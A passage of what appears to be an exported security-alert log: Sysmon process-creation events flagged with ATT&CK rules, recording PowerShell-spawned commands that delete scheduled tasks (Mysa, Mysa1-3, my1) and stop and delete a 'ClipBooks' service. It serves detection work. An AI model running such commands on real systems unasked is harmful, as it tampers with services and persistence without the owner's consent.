MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.009850400Z"",""eventRecordID"":""3288"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.007\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010d9a32b00}\r\nProcessId: 4672\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 
(WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.007"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-0010d9a32b00}"",""processId"":""4672"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.298",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.984 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010d7a12b00} +ProcessId: 652 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.986509600Z"",""eventRecordID"":""3287"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.984\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010d7a12b00}\r\nProcessId: 652\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.984"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-0010d7a12b00}"",""processId"":""652"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.277",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.959 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010c49f2b00} +ProcessId: 6704 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.961827200Z"",""eventRecordID"":""3286"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.959\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010c49f2b00}\r\nProcessId: 6704\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:32.959"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-0010c49f2b00}"",""processId"":""6704"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.258",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.932 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010fd9d2b00} +ProcessId: 2100 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium 
+Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.935094700Z"",""eventRecordID"":""3285"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.932\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010fd9d2b00}\r\nProcessId: 2100\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.932"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-0010fd9d2b00}"",""processId"":""2100"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.235",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.893 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-00101d9b2b00} +ProcessId: 1820 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN my1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.899473100Z"",""eventRecordID"":""3284"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.893\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-00101d9b2b00}\r\nProcessId: 1820\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.893"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-00101d9b2b00}"",""processId"":""1820"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN my1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.214",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.868 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-00103f9a2b00} +ProcessId: 4864 +Image: C:\Windows\System32\sc.exe 
+FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete ClipBooks +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete ClipBooks",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.877552500Z"",""eventRecordID"":""3283"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.868\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-00103f9a2b00}\r\nProcessId: 4864\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete ClipBooks\r\nCurrentDirectory: C:\\Users\\John 
Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.868"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-00103f9a2b00}"",""processId"":""4864"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete ClipBooks"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.202",8,"ATT&CK T1489: Stop Windows Service","""Process 
Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.843 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-00102f992b00} +ProcessId: 8124 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ClipBooks +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 